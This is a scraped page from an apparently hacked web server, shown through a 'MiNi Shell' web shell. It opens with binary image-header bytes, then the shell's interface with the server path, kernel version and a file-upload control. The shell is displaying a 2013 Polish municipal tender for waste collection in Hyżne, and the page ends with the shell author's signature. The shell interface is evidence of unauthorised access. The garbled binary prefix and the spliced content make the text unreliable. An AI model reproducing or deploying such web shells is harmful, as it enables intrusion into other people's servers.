JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131209/507418-N-2013.html

<p class="kh_header"><b>Hyżne: ODBIERANIE ODPADÓW KOMUNALNYCH 
OD WŁAŚCICIELI NIERUCHOMOŚCI 
ZAMIESZKAŁYCH PRZEZ MIESZKAŃCÓW
W GMINIE HYŻNE</b><br>
<b>Numer ogłoszenia: 507418 - 2013; data zamieszczenia: 09.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Hyżne , Hyżne 103, 36-024 Hyżne, woj. podkarpackie, tel. 017 2295002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://hyzne.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODBIERANIE ODPADÓW KOMUNALNYCH 
OD WŁAŚCICIELI NIERUCHOMOŚCI 
ZAMIESZKAŁYCH PRZEZ MIESZKAŃCÓW
W GMINIE HYŻNE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1Odpady będą odbierane z terenu gminy Hyżne, szacunkowa liczba mieszkańców od których będą odbierane odpady komunalne to ok. 6000 mieszkańców w ok. 1640 gospodarstwach na terenie siedmiu sołectw: Brzezówka, Dylągówka, Grzegorzówka, Hyżne, Nieborów, Szklary, Wólka Hyżneńska. Zamawiający przewiduje zmiany ilości gospodarstw ? 5%
2Zbiórką zostanie objęty teren całej gminy według uzgodnionych między Zamawiającym   a Wykonawcą tras przejazdu  - Mapa poglądowa z naniesionymi trasami przejazdu samochodów  - Zał. Nr . 1 A
3Zakres przedmiotu zamówienia obejmuje odbiór i zagospodarowanie:
1)Zmieszanych niesegregowanych odpadów komunalnych o kodzie 20 03 01 zgromadzonych              w workach i wystawionych na trasie odbioru z nieruchomości zabudowanych mieszkalnych           w ilości ok. 350 Mg.
2)Segregowanych odpadów komunalnych, gromadzonych w sposób selektywny w odpowiednio oznakowanych workach lub pojemnikach i wystawionych na trasie odbioru, podanych poniżej rodzajów odpadów w ilości  ok. 320 Mg :
a)Tworzywa sztuczne ( kody 20 01 39, 15 01 02, 15 01 05), 
b)Szkło i opakowania ze szkła ( kod 20 01 02, 15 01 07),
cMakulatura ( kod 20 01 01, 15 01 01),
d)Odpady kuchenne i ogrodowe ( kod, 20 03 02, 20 01 99, 20 02 01, 20 01 08 ),
e)Metal (puszki, drobny złom) ( kod 15 01 04, 20 01 40)
Pozostałych odpadów  segregowanych wyszczególnionych poniżej, zebranych dwa raz w roku w łącznej ilości ok. 20 Mg :
f)Zużytych opon o kodzie (16 01 03, 20 03 99)
g)Odpadów wielkogabarytowych o kodzie (20 03 07)
h)Zużytego  sprzętu elektrycznego i elektronicznego o kodach 20 01 35, 20 01 36,
i)Odpadów niebezpiecznych powstających w gospodarstwach domowych (tj. chemikalia, farby, środki ochrony roślin, detergenty, baterie, przeterminowane leki) o kodach 20 01 13, 20 01 14, 20 01 15, 20 01 19, 20 01 27, 20 01 29, 20 01 33)

4Odpady odbierane z terenu gminy będą gromadzone w workach o poj. od 60 l. do 120 l. oraz
pojemnikach specjalistycznych o różnej pojemności, np. na przeterminowane leki, baterie itp.

5Wykonawca w ramach zamówienia zobowiązany jest dostarczyć mieszkańcom worki na odpady wg. zapotrzebowania mieszkańców.
 
6Worki do gromadzenia odpadów komunalnych posiadać będą następujące kolory :
1)kolor czarny przeznaczony na odpady niesegregowane, zmieszane odpady komunalne
2)kolor żółty - przeznaczony na  tworzywa sztuczne 
3)kolor czerwony - przeznaczony na odpady wielomateriałowe (np: karton po mleku lub soku)
4)kolor niebieski -  przeznaczony na makulaturę
5)kolor zielony -  przeznaczony na szkło i opakowania ze szkła
6)kolor szary -  przeznaczony na metale (puszki i drobny złom)
7)kolor brązowy przeznaczony na odpady biodegradowalne
  wraz z nadrukiem zawierającym informację o rodzajach odpadów które można w tych workach umieścić.
7Wykonawca otrzyma od Zamawiającego kody kreskowe, które wraz z workami na odpady segregowane i niesegregowane  będzie przekazywał właścicielom nieruchomości zabudowanych.
8Zamawiający informuje, że posiada program komputerowy QNet firmy NETPROCES Systemy informatyczne do obsługi gospodarki odpadami.
9Wykonawca otrzyma od Zamawiającego skaner (czytnik) kodów kreskowych i zobowiązany     jest  do stosowania go przy odbiorze zbieranych odpadów   (skaner posiada wbudowany lokalizator GPS).
10Szczegółowy wykaz zawierający dane właścicieli nieruchomości Zamawiający dostarczy Wykonawcy po podpisaniu umowy, a także  w razie  zaistniałych zmian.  
11Wykonawca zbiera worki posiadające umieszczone przez właścicieli nieruchomości numery identyfikacyjne (kody kreskowe). Numer identyfikacyjny (kod kreskowy) nadaje Gmina Hyżne                 po otrzymaniu podpisanej Deklaracji od właściciela nieruchomości zamieszkałej. 
12Według obliczeń Urzędu Gminy w Hyżnem,  w okresie wykonywania zadania, szacunkowa ilość wytworzonych odpadów, wyniesie:
1)Odpady niesegregowane  -  350 Mg
2)Odpady segregowane  - 320 Mg

13Odbiór odpadów komunalnych odbywać się będzie:
- odpady zmieszane co 2 tygodnie
- zbierane selektywnie ( papier tektura, szkło, tworzywa sztuczne, metale, opakowania wielomateriałowe) - jeden raz w miesiącu 
14Strony ustalają, że odbiór odpadów z terenu Gminy Hyżne odbywać się będzie zgodnie   z ustalonym harmonogramem, ustalonym pomiędzy Wykonawcą a Zamawiającym przed podpisaniem umowy. Harmonogram Wykonawca zobowiązany jest dostarczyć właścicielom nieruchomości zabudowanym wraz z workami i kodami.
15W czasie realizacji zamówienia Wykonawca będzie zbierał odpady wg tras które określa mapa poglądowa z naniesionymi trasami przejazdu samochodów odbierających odpady komunalne                  z terenu gminy Hyżne -załącznik do umowy. 
16Odpady wielkogabarytowe zbierane będą przez Wykonawcę raz w roku w terminie i na trasach  ustalonych przez Zamawiającego w porozumieniu z Wykonawcą.
17Zużyty sprzęt elektryczny i elektroniczny, opony, chemikalia  wystawione przez mieszkańców, zebrane będą raz w roku - analogicznie jak wyżej - w terminie i trasach ustalonych przez Zamawiającego w porozumieniu z Wykonawcą.
18Trasa przejazdu Wykonawcy naniesiona została na mapę poglądową stanowiącą załącznik                nr 1  A do SIWZ - łączna długość trasy objazdu wynosi ok.120 km. ? 15% 
19Wykonawca przed zakwalifikowaniem odpadów segregowanych do zmieszanych wynikającym   - z niedopełnienia przez mieszkańca obowiązku selektywnego zbierania odpadów komunalnych, sporządza na tą okoliczność dokumentację: notatkę wraz z  dokumentacją fotograficzną umożliwiającą wydanie przez Zamawiającego decyzji administracyjnej jako podstawy do naliczenia wyższej stawki za odbiór odpadów. Wykaz numerów identyfikacyjnych nieruchomości wraz           z dokumentacją poświadczającą nieprawidłową segregację odpadów Wykonawca przekaże niezwłocznie Zamawiającemu .
20Jeżeli właściciel nieruchomości wystawi worek w odpowiednim kolorze lecz bez nadruku Wykonawcy a zaopatrzony będzie w odpowiedni kod kreskowy ewidencjonujący nieruchomość,             z poprawnie wyselekcjonowanymi odpadami to wówczas Wykonawca jest obowiązany odebrać odpady komunalne z nieruchomości.
21W ramach zagospodarowania odpadów podmiot odbierający odpady zobowiązany jest                        do przekazywania odebranych zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do regionalnej lub  zastępczej regionalnej instalacji do przetwarzania odpadów komunalnych, właściwej dla regionu centralnego województwa podkarpackiego zgodnie z uchwałą Sejmiku województwa podkarpackiego: Nr XXIV/409/12 z dnia 27 sierpnia 2012 r. w sprawie  przyjęcia projektu Planu Gospodarki Odpadami dla Województwa Podkarpackiego i uchwalenia Planu Gospodarki Odpadami dla Województwa Podkarpackiego. 
22W przypadku selektywnie zebranych odpadów komunalnych, w ramach zagospodarowania odpadów, Wykonawca zobowiązany jest do ich przekazywania do instalacji odzysku                             i unieszkodliwiania, zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 7 ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz.U. 2010 nr 185 poz. 1243z późn. zm.).
23Wykonawca zobowiązany jest  do porządkowania terenu w miejscu gromadzenia odpadów                     w przypadku jego zanieczyszczenia.
24Odbiór odpadów komunalnych przez regionalną lub zastępczą instalację do zagospodarowania odpadów uwzględnioną z WPGO zapewnia sobie Wykonawca.
25Wykonawca ponosi całkowitą odpowiedzialność za prawidłowe gospodarowanie odebranymi odpadami zgodnie z przepisami obowiązującymi w tym zakresie. Dotyczy to m.in. zbiórki odpadów, ewentualnego przeładunku odpadów, transportu odpadów, spraw formalno - prawnych związanych z odbieraniem i dostarczaniem odpadów uprawnionemu przedsiębiorcy prowadzącemu działalność w zakresie odzysku lub unieszkodliwiania odpadów komunalnych.
26W celu realizacji przedmiotu umowy Wykonawca musi dysponować specjalistycznymi środkami technicznymi umożliwiającymi odbiór odpadów w tym gromadzonych w workach.  
Zamawiający uzna za spełnienie warunku udziału w postępowaniu jeżeli Wykonawca wykaże dysponowanie co najmniej: - dwoma samochodami przystosowanymi do odbierania zmieszanych odpadów komunalnych tzw. śmieciarki o ładowności minimum 6 ton, -dwoma samochodami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych -dwoma pojazdami do odbierania odpadów - samochody dostawcze o ładowności minimum 2,5 tony - umożliwiające odbiór odpadów komunalnych z trudno dostępnych górzystych terenów.

27Wykonawca jest zobowiązany do spełnienia wszystkich wymagań z art. 9d ustawy o utrzymaniu czystości porządku w gminach - Ustawa z dnia 1 lipca 2011 r. o zmianie ustawy o utrzymaniu czystości i porządku w gminach oraz niektórych innych ustaw (Dz.U. 2011 nr 152 poz. 897)
28Zamawiający dopuszcza możliwość odbioru odpadów segregowanych jednym wyspecjalizowanym pojazdem nie dokonując mieszania poszczególnych frakcji odpadów selektywnie zebranych.
29W sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamkniecie drogi), gdy nie jest możliwa realizacja usługi zgodnie z umową, sposób i termin odbioru odpadów będzie każdorazowo uzgadniany pomiędzy Zamawiającym i Wykonawcą i może  polegać w szczególności     na wyznaczeniu zastępczych miejsc gromadzenia odpadów przez właścicieli nieruchomości, oraz innych terminów ich odbioru. W takich przypadkach Wykonawcy nie przysługuje dodatkowe wynagrodzenie.
30 Wykonawca zobowiązany jest do spełniania przez cały okres wykonywania usługi wszystkich wymogów wynikających z obowiązujących przepisów prawa, dotyczących odbierania                           i zagospodarowania odpadów komunalnych.
31Wykonawca będzie prowadził i przedkładał Zamawiającemu dokumentację z realizacji przedmiotu zamówienia, tj.:
1)Karty przekazania odpadów, sporządzone zgodnie z obowiązującymi przepisami.
2)Miesięczne zestawienie odebranych odpadów komunalnych zmieszanych
3)Miesięczne zestawienie odebranych odpadów komunalnych segregowanych 
4)Kwartalną informację zgodnie z art. 9n ustawy o utrzymaniu czystości i porządku w gminach.
32Wynagrodzenie jest uzależnione od ilości odebranych odpadów przez Wykonawcę. Podana                     w SIWZ ilość odpadów jest szacunkowa i została określona na potrzeby wyceny przedmiotu zamówienia. Może ona ulec zmianie stosownie do rzeczywistych potrzeb Zamawiającego.
33 Zapłata należności za wykonywanie usługi realizowana będzie miesięczne w zależności od ilości wywiezionych odpadów, tj. tona odpadów X stawka jednostkowa..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - Zamawiający uzna spełnienie warunku udziału w postępowaniu, jeżeli Wykonawca przedłoży aktualny wpis do Rejestru Działalności Regulowanej prowadzonego przez Wójta Gminy Hyżne</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli Wykonawca ubiegający się o udzielenie przedmiotowego zamówienia wykaże się należytym wykonaniem, w okresie ostatnich  trzech lat przed upływem terminu składania Ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie   1 usługi odbioru odpadów komunalnych wykonanej na rzecz właścicieli nieruchomości w sposób ciągły przez okres minimum 12 miesięcy o masie łącznej minimum - 150 Mg- dotyczy odpadów  zmieszanych i 150 Mg odpadów segregowanych.
  
W celu oceny spełnienia przez Wykonawcę warunku, o którym mowa powyżej Zamawiający żąda sporządzenia i przedłożenia wraz z ofertą Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, że zostały wykonane lub są wykonywane należycie. Wzór Wykazu stanowi Załącznik nr 6 do SIWZ.
Dowodami, o których mowa powyżej są:
a)	poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
b)	oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 2 lit. a.
W przypadku gdy zamawiający jest podmiotem na rzecz którego usługi wskazane w Wykazie, o którym mowa w ust. 1 pkt 2 zostały wcześniej Wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa wyżej.
W postępowaniach o udzielenie zamówienia publicznego wszczynanych w okresie od 19 lutego 2013 r. do 19 lutego.2014 r., wykonawca w miejsce poświadczeń może przedkładać dokumenty potwierdzające należyte wykonanie usług określone w § 1 ust. 1 pkt. 2 i 3 rozporządzenia Prezesa Rady Ministrów  z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817) - dotyczy również przedmiotowego postępowania</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie warunku udziału w postępowaniu jeżeli Wykonawca wykaże dysponowanie co najmniej: 
- dwoma samochodami przystosowanymi do odbierania zmieszanych odpadów komunalnych tzw. śmieciarki o ładowności minimum 6 ton, 
-dwoma samochodami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych
 -dwoma pojazdami do odbierania odpadów - samochody dostawcze o ładowności minimum 2,5 tony - umożliwiające odbiór odpadów komunalnych z trudno dostępnych górzystych terenów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający nie precyzuje w tym zakresie żadnych  wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Warunek ten zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału                    w postępowaniu określonych w art 22 ust 1 ustawy z dnia 29 stycznia 2004 r Prawo Zamówień Publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest: ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 100.000,00 (sto tysięcy złotych)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://hyzne.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Hyżne              36-024 Hyżne 103.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2013 godzina 10:50, miejsce: Urząd Gminy Hyżne              36-024 Hyżne 103  ( sekretariat pok. Nr 1).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com